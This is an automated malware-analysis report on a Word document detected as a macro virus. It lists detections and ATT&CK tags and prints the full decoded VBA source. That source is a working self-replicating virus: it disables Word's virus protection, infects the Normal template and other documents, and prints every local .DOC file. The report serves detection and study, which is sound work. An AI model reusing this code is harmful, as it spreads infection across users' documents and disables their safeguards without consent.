MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with a Document_Open subroutine, which is a common technique for executing malicious code upon opening a document. The script explicitly attempts to disable 'VirusProtection' and then proceeds to print all files with a .DOC extension in the local directory. This behavior suggests a destructive or disruptive intent, possibly framed as a contest entry as indicated by the document body text.
Heuristics 4
- ClamAV: Doc.Trojan.Small-498 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Small-498
- VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS: Document contains VBA macro code
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL http://pegasus.cc.ucf.edu/~kes65601: In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1685 bytes |

SHA-256: ba527b1ff5114cd5522ec05d35936c7cb7de5e2912ac794c1422b19f6e37e260

Detection: ClamAV: Doc.Trojan.Small-498

Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
' Disable Macro Protection
Options.VirusProtection = (1 + 2 - 3):
' Copy Active to Normal
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Find("Document_Open", 1, 10, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines, 30, True, False, False) = False Then
ActiveDocument.VBProject.VBComponents.Item(1).Export ("SkamWerks")
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("SkamWerks")
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4
Options.SaveNormalPrompt = (-2 + 2)
' Copy From Normal to Active
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Find("Document_Open", 1, 10, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines, 30, True, False, False) = False Then
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("SkamWerks")
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'Payload - Print Out All Docs in Local Directory.
myDoc = Dir("*.DOC"): While myDoc <> "": Application.PrintOut FileName:=myDoc: myDoc = Dir(): Wend
End If
End Sub
' SmallWorld Virii - By Skammy of SkamWerks! http://pegasus.cc.ucf.edu/~kes65601
' Written for the sole purpose of the Smallest Word Class Macro Virii Contest!
' Please do not distrubute!